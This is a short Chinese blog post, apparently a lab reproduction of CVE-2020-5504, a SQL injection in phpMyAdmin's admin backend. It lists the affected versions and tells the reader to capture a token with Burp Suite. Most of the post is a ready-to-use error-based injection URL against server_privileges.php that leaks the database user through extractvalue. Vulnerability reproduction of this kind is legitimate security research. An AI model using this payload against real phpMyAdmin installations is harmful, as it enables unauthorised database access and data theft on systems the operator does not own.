phpmyadmin 后台sql注入漏洞复现(CVE-2020-5504)
phpmyadmin 后台sql注入漏洞复现(CVE-2020-5504)
影响版本
1 | Phpmyadmin <= 5.00 |
漏洞复现
拿到环境使用给出的账号密码进入后台,开启Burpsuite抓包,获取到一个token,保存下来
直接将请求的地址替换成poc即可。poc如下,记得需要替换token
1 | server_privileges.php?ajax_request=true&validate_username=1&username=1'and extractvalue(1,concat(0x7e,(select user()),0x7e))--+db=&token=3c7c5b2b7f3a7621394d6c733e35705f&viewing_mode=server |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 ch1e的随笔!